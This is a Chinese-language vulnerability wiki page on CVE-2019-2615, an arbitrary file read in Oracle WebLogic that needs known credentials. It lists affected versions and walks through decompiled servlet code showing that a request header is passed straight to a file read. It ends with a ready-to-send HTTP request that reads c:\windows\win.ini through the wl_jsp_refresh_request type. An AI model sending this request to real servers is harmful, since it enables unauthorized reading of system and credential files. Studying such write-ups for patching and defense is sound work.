menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Weblogic chevron_right (CVE-2019-2615)Weblogic 任意文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-2615)Weblogic 任意文件读取漏洞.md
    4.46 KB / 2021-04-21 09:23:46
        (CVE-2019-2615)Weblogic 任意文件读取漏洞
    ==========================================
    
    一、漏洞简介
    ------------
    
    攻击者可以在已知用户名密码的情况下读取WebLogic服务器中的任意文件。
    
    二、漏洞影响
    ------------
    
    Weblogic 10.3.6.0Weblogic 12.1.3.0Weblogic 12.2.1.2Weblogic 12.2.1.3
    
    三、复现过程
    ------------
    
    ### 漏洞分析
    
    该功能的关键代码在
    `weblogic.management.servlet.FileDistributionServlet`的doGet()方法中:
    
        public void doGet(final HttpServletRequest var1, final HttpServletResponse var2) throws ServletException, IOException {
            AuthenticatedSubject var3 = this.authenticateRequest(var1, var2);
            if(var3 != null) {
                final String var4 = var1.getHeader("wl_request_type");
                if(var3 != KERNEL_ID) {
                    AdminResource var5 = new AdminResource("FileDownload", (String)null, var4);
                    if(!this.am.isAccessAllowed(var3, var5, (ContextHandler)null)) {
                        ManagementLogger.logErrorFDSUnauthorizedDownloadAttempt(var3.getName(), var4);
                        var2.sendError(401);
                        return;
                    }
                }
    
                try {
                    if(debugLogger.isDebugEnabled()) {
                        debugLogger.debug("---- >doGet incoming request: " + var4);
                    }
    
                    if(var4.equals("wl_xml_entity_request")) {
                        this.doGetXMLEntityRequest(var1, var2);
                    } else if(var4.equals("wl_jsp_refresh_request")) {
                        this.doGetJspRefreshRequest(var1, var2);
                    } else if(var4.equals("file")) {
                        this.doGetFile(var1, var2);
                    } else if(!var4.equals("wl_init_replica_request") && !var4.equals("wl_file_realm_request") && !var4.equals("wl_managed_server_independence_request")) {
                        var2.addHeader("ErrorMsg", "Bad request type");
                        String var10 = Utils.encodeXSS(var4);
                        var2.sendError(400, "Bad request type: " + var10);
                        ManagementLogger.logBadRequestInFileDistributionServlet(var4);
                    } else {
                        ......
                        ......
                        }
                    }
                } catch (Exception var9) {
                    if(!Kernel.isInitialized()) {
                        throw new AssertionError("kernel not initialized");
                    }
    
                    ManagementLogger.logErrorInFileDistributionServlet(var4, var9);
                }
    
            }
        }
    
    代码也比较简单,先取request中header的参数\"wl\_request\_type\"的值,然后判断如果该值等于"wl\_xml\_entity\_request"、"wl\_jsp\_refresh\_request"、"file"\...\...则分别调用各自的方法,进入下一步判断。我们看一下如果wl\_request\_type的值为"wl\_jsp\_refresh\_request",进入doGetJspRefreshRequest()方法。我们跟入doGetJspRefreshRequest()方法:
    
        private void doGetJspRefreshRequest(HttpServletRequest var1, HttpServletResponse var2) throws IOException {
             String var3 = var1.getHeader("adminPath");
    
             try {
                 FileInputStream var4 = new FileInputStream(var3);
    
                 try {
                     var2.setContentType("text/plain");
                     var2.setStatus(200);
                     this.returnInputStream(var4, var2.getOutputStream());
                 } finally {
                     var4.close();
                 }
    
             } catch (IOException var10) {
                 String var5 = "I/O Exception getting resource: " + var10.getMessage();
                 var2.addHeader("ErrorMsg", var5);
                 var2.sendError(500, var5);
             }
         }
    
    doGetJspRefreshRequest()方法中的"adminPath"也是request中的header参数,我们在Post包中传入要读取的文件。进入该方法中,直接使用FileInputStream类进行文件读取,故造成了所谓的"任意文件读取"漏洞。
    
    ### 漏洞复现
    
        GET /bea_wls_management_internal2/wl_management HTTP/1.1
        Host: www.0-sec.org:7001
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        username:weblogic
        password:admin123456
        wl_request_type:wl_jsp_refresh_request
        adminPath:c:\windows\win.ini
        Upgrade-Insecure-Requests: 1
    
    ![M\~P\`JFB4OPB3JUN7FJ\_F.png](./resource/(CVE-2019-2615)Weblogic任意文件读取漏洞/media/rId26.png)
    
    
    links
    file_download